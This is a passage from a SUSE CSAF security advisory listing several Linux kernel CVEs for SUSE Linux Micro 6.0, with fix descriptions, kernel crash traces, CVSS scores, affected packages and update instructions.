"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54215",
"url": "https://www.suse.com/security/cve/CVE-2023-54215"
},
{
"category": "external",
"summary": "SUSE Bug 1255957 for CVE-2023-54215",
"url": "https://bugzilla.suse.com/1255957"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54215"
},
{
"cve": "CVE-2023-54219",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54219"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"IB/isert: Fix incorrect release of isert connection\"\n\nCommit: 699826f4e30a (\"IB/isert: Fix incorrect release of isert connection\") is\ncausing problems on OPA when DEVICE_REMOVAL is happening.\n\n ------------[ cut here ]------------\n WARNING: CPU: 52 PID: 2117247 at drivers/infiniband/core/cq.c:359\nib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n Modules linked in: nfsd nfs_acl target_core_user uio tcm_fc libfc\nscsi_transport_fc tcm_loop target_core_pscsi target_core_iblock target_core_file\nrpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs\nrfkill rpcrdma rdma_ucm ib_srpt sunrpc ib_isert iscsi_target_mod target_core_mod\nopa_vnic ib_iser libiscsi ib_umad scsi_transport_iscsi rdma_cm ib_ipoib iw_cm\nib_cm hfi1(-) rdmavt ib_uverbs intel_rapl_msr intel_rapl_common sb_edac ib_core\nx86_pkg_temp_thermal intel_powerclamp coretemp i2c_i801 mxm_wmi rapl iTCO_wdt\nipmi_si iTCO_vendor_support mei_me ipmi_devintf mei intel_cstate ioatdma\nintel_uncore i2c_smbus joydev pcspkr lpc_ich ipmi_msghandler acpi_power_meter\nacpi_pad xfs libcrc32c sr_mod sd_mod cdrom t10_pi sg crct10dif_pclmul\ncrc32_pclmul crc32c_intel drm_kms_helper drm_shmem_helper ahci libahci\nghash_clmulni_intel igb drm libata dca i2c_algo_bit wmi fuse\n CPU: 52 PID: 2117247 Comm: modprobe Not tainted 6.5.0-rc1+ #1\n Hardware name: Intel Corporation S2600CWR/S2600CW, BIOS\nSE5C610.86B.01.01.0014.121820151719 12/18/2015\n RIP: 0010:ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n Code: ff 48 8b 43 40 48 8d 7b 40 48 83 e8 40 4c 39 e7 75 b3 49 83\nc4 10 4d 39 fc 75 94 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc \u003c0f\u003e 0b eb a1\n90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f\n RSP: 0018:ffffc10bea13fc80 EFLAGS: 00010206\n RAX: 000000000000010c RBX: ffff9bf5c7e66c00 RCX: 000000008020001d\n RDX: 000000008020001e RSI: fffff175221f9900 RDI: ffff9bf5c7e67640\n RBP: ffff9bf5c7e67600 R08: ffff9bf5c7e64400 R09: 000000008020001d\n R10: 0000000040000000 R11: 0000000000000000 R12: ffff9bee4b1e8a18\n R13: dead000000000122 R14: dead000000000100 R15: ffff9bee4b1e8a38\n FS: 00007ff1e6d38740(0000) GS:ffff9bfd9fb00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00005652044ecc68 CR3: 0000000889b5c005 CR4: 00000000001706e0\n Call Trace:\n \u003cTASK\u003e\n ? __warn+0x80/0x130\n ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n ? report_bug+0x195/0x1a0\n ? handle_bug+0x3c/0x70\n ? exc_invalid_op+0x14/0x70\n ? asm_exc_invalid_op+0x16/0x20\n ? ib_cq_pool_cleanup+0xac/0xb0 [ib_core]\n disable_device+0x9d/0x160 [ib_core]\n __ib_unregister_device+0x42/0xb0 [ib_core]\n ib_unregister_device+0x22/0x30 [ib_core]\n rvt_unregister_device+0x20/0x90 [rdmavt]\n hfi1_unregister_ib_device+0x16/0xf0 [hfi1]\n remove_one+0x55/0x1a0 [hfi1]\n pci_device_remove+0x36/0xa0\n device_release_driver_internal+0x193/0x200\n driver_detach+0x44/0x90\n bus_remove_driver+0x69/0xf0\n pci_unregister_driver+0x2a/0xb0\n hfi1_mod_cleanup+0xc/0x3c [hfi1]\n __do_sys_delete_module.constprop.0+0x17a/0x2f0\n ? exit_to_user_mode_prepare+0xc4/0xd0\n ? syscall_trace_enter.constprop.0+0x126/0x1a0\n do_syscall_64+0x5c/0x90\n ? syscall_exit_to_user_mode+0x12/0x30\n ? do_syscall_64+0x69/0x90\n ? syscall_exit_work+0x103/0x130\n ? syscall_exit_to_user_mode+0x12/0x30\n ? do_syscall_64+0x69/0x90\n ? exc_page_fault+0x65/0x150\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n RIP: 0033:0x7ff1e643f5ab\n Code: 73 01 c3 48 8b 0d 75 a8 1b 00 f7 d8 64 89 01 48 83 c8 ff c3\n66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa b8 b0 00 00 00 0f 05 \u003c48\u003e 3d 01 f0\nff ff 73 01 c3 48 8b 0d 45 a8 1b 00 f7 d8 64 89 01 48\n RSP: 002b:00007ffec9103cc8 EFLAGS: 00000206 ORIG_RAX: 00000000000000b0\n RAX: ffffffffffffffda RBX: 00005615267fdc50 RCX: 00007ff1e643f5ab\n RDX: 0000000000000000 RSI: 0000000000000800 RDI: 00005615267fdcb8\n RBP: 00005615267fdc50 R08: 0000000000000000 R09: 0000000000000000\n R10: 00007ff1e659eac0 R11: 0000000000000206 R12: 00005615267fdcb8\n R13: 00000000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54219",
"url": "https://www.suse.com/security/cve/CVE-2023-54219"
},
{
"category": "external",
"summary": "SUSE Bug 1256231 for CVE-2023-54219",
"url": "https://bugzilla.suse.com/1256231"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54219"
},
{
"cve": "CVE-2023-54220",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54220"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: 8250: Fix oops for port-\u003epm on uart_change_pm()\n\nUnloading a hardware specific 8250 driver can produce error \"Unable to\nhandle kernel paging request at virtual address\" about ten seconds after\nunloading the driver. This happens on uart_hangup() calling\nuart_change_pm().\n\nTurns out commit 04e82793f068 (\"serial: 8250: Reinit port-\u003epm on port\nspecific driver unbind\") was only a partial fix. If the hardware specific\ndriver has initialized port-\u003epm function, we need to clear port-\u003epm too.\nJust reinitializing port-\u003eops does not do this. Otherwise serial8250_pm()\nwill call port-\u003epm() instead of serial8250_do_pm().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54220",
"url": "https://www.suse.com/security/cve/CVE-2023-54220"
},
{
"category": "external",
"summary": "SUSE Bug 1255949 for CVE-2023-54220",
"url": "https://bugzilla.suse.com/1255949"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54220"
},
{
"cve": "CVE-2023-54221",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54221"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: imx93: fix memory leak and missing unwind goto in imx93_clocks_probe\n\nIn function probe(), it returns directly without unregistered hws\nwhen error occurs.\n\nFix this by adding \u0027goto unregister_hws;\u0027 on line 295 and\nline 310.\n\nUse devm_kzalloc() instead of kzalloc() to automatically\nfree the memory using devm_kfree() when error occurs.\n\nReplace of_iomap() with devm_of_iomap() to automatically\nhandle the unused ioremap region and delete \u0027iounmap(anatop_base);\u0027\nin unregister_hws.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54221",
"url": "https://www.suse.com/security/cve/CVE-2023-54221"
},
{
"category": "external",
"summary": "SUSE Bug 1255842 for CVE-2023-54221",
"url": "https://bugzilla.suse.com/1255842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54221"
},
{
"cve": "CVE-2023-54223",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54223"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: xsk: Fix invalid buffer access for legacy rq\n\nThe below crash can be encountered when using xdpsock in rx mode for\nlegacy rq: the buffer gets released in the XDP_REDIRECT path, and then\nonce again in the driver. This fix sets the flag to avoid releasing on\nthe driver side.\n\nXSK handling of buffers for legacy rq was relying on the caller to set\nthe skip release flag. But the referenced fix started using fragment\ncounts for pages instead of the skip flag.\n\nCrash log:\n general protection fault, probably for non-canonical address 0xffff8881217e3a: 0000 [#1] SMP\n CPU: 0 PID: 14 Comm: ksoftirqd/0 Not tainted 6.5.0-rc1+ #31\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n RIP: 0010:bpf_prog_03b13f331978c78c+0xf/0x28\n Code: ...\n RSP: 0018:ffff88810082fc98 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: ffff888138404901 RCX: c0ffffc900027cbc\n RDX: ffffffffa000b514 RSI: 00ffff8881217e32 RDI: ffff888138404901\n RBP: ffff88810082fc98 R08: 0000000000091100 R09: 0000000000000006\n R10: 0000000000000800 R11: 0000000000000800 R12: ffffc9000027a000\n R13: ffff8881217e2dc0 R14: ffff8881217e2910 R15: ffff8881217e2f00\n FS: 0000000000000000(0000) GS:ffff88852c800000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000564cb2e2cde0 CR3: 000000010e603004 CR4: 0000000000370eb0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x32/0x80\n ? exc_general_protection+0x192/0x390\n ? asm_exc_general_protection+0x22/0x30\n ? 0xffffffffa000b514\n ? bpf_prog_03b13f331978c78c+0xf/0x28\n mlx5e_xdp_handle+0x48/0x670 [mlx5_core]\n ? dev_gro_receive+0x3b5/0x6e0\n mlx5e_xsk_skb_from_cqe_linear+0x6e/0x90 [mlx5_core]\n mlx5e_handle_rx_cqe+0x55/0x100 [mlx5_core]\n mlx5e_poll_rx_cq+0x87/0x6e0 [mlx5_core]\n mlx5e_napi_poll+0x45e/0x6b0 [mlx5_core]\n __napi_poll+0x25/0x1a0\n net_rx_action+0x28a/0x300\n __do_softirq+0xcd/0x279\n ? sort_range+0x20/0x20\n run_ksoftirqd+0x1a/0x20\n smpboot_thread_fn+0xa2/0x130\n kthread+0xc9/0xf0\n ? kthread_complete_and_exit+0x20/0x20\n ret_from_fork+0x1f/0x30\n \u003c/TASK\u003e\n Modules linked in: mlx5_ib mlx5_core rpcrdma rdma_ucm ib_iser libiscsi scsi_transport_iscsi ib_umad rdma_cm ib_ipoib iw_cm ib_cm ib_uverbs ib_core xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xt_addrtype iptable_nat nf_nat br_netfilter overlay zram zsmalloc fuse [last unloaded: mlx5_core]\n ---[ end trace 0000000000000000 ]---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54223",
"url": "https://www.suse.com/security/cve/CVE-2023-54223"
},
{
"category": "external",
"summary": "SUSE Bug 1256233 for CVE-2023-54223",
"url": "https://bugzilla.suse.com/1256233"
},
{
"category": "external",
"summary": "SUSE Bug 1256253 for CVE-2023-54223",
"url": "https://bugzilla.suse.com/1256253"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54223"
},
{
"cve": "CVE-2023-54224",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54224"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix lockdep splat and potential deadlock after failure running delayed items\n\nWhen running delayed items we are holding a delayed node\u0027s mutex and then\nwe will attempt to modify a subvolume btree to insert/update/delete the\ndelayed items. However if have an error during the insertions for example,\nbtrfs_insert_delayed_items() may return with a path that has locked extent\nbuffers (a leaf at the very least), and then we attempt to release the\ndelayed node at __btrfs_run_delayed_items(), which requires taking the\ndelayed node\u0027s mutex, causing an ABBA type of deadlock. This was reported\nby syzbot and the lockdep splat is the following:\n\n WARNING: possible circular locking dependency detected\n 6.5.0-rc7-syzkaller-00024-g93f5de5f648d #0 Not tainted\n ------------------------------------------------------\n syz-executor.2/13257 is trying to acquire lock:\n ffff88801835c0c0 (\u0026delayed_node-\u003emutex){+.+.}-{3:3}, at: __btrfs_release_delayed_node+0x9a/0xaa0 fs/btrfs/delayed-inode.c:256\n\n but task is already holding lock:\n ffff88802a5ab8e8 (btrfs-tree-00){++++}-{3:3}, at: __btrfs_tree_lock+0x3c/0x2a0 fs/btrfs/locking.c:198\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #1 (btrfs-tree-00){++++}-{3:3}:\n __lock_release kernel/locking/lockdep.c:5475 [inline]\n lock_release+0x36f/0x9d0 kernel/locking/lockdep.c:5781\n up_write+0x79/0x580 kernel/locking/rwsem.c:1625\n btrfs_tree_unlock_rw fs/btrfs/locking.h:189 [inline]\n btrfs_unlock_up_safe+0x179/0x3b0 fs/btrfs/locking.c:239\n search_leaf fs/btrfs/ctree.c:1986 [inline]\n btrfs_search_slot+0x2511/0x2f80 fs/btrfs/ctree.c:2230\n btrfs_insert_empty_items+0x9c/0x180 fs/btrfs/ctree.c:4376\n btrfs_insert_delayed_item fs/btrfs/delayed-inode.c:746 [inline]\n btrfs_insert_delayed_items fs/btrfs/delayed-inode.c:824 [inline]\n __btrfs_commit_inode_delayed_items+0xd24/0x2410 fs/btrfs/delayed-inode.c:1111\n __btrfs_run_delayed_items+0x1db/0x430 fs/btrfs/delayed-inode.c:1153\n flush_space+0x269/0xe70 fs/btrfs/space-info.c:723\n btrfs_async_reclaim_metadata_space+0x106/0x350 fs/btrfs/space-info.c:1078\n process_one_work+0x92c/0x12c0 kernel/workqueue.c:2600\n worker_thread+0xa63/0x1210 kernel/workqueue.c:2751\n kthread+0x2b8/0x350 kernel/kthread.c:389\n ret_from_fork+0x2e/0x60 arch/x86/kernel/process.c:145\n ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304\n\n -\u003e #0 (\u0026delayed_node-\u003emutex){+.+.}-{3:3}:\n check_prev_add kernel/locking/lockdep.c:3142 [inline]\n check_prevs_add kernel/locking/lockdep.c:3261 [inline]\n validate_chain kernel/locking/lockdep.c:3876 [inline]\n __lock_acquire+0x39ff/0x7f70 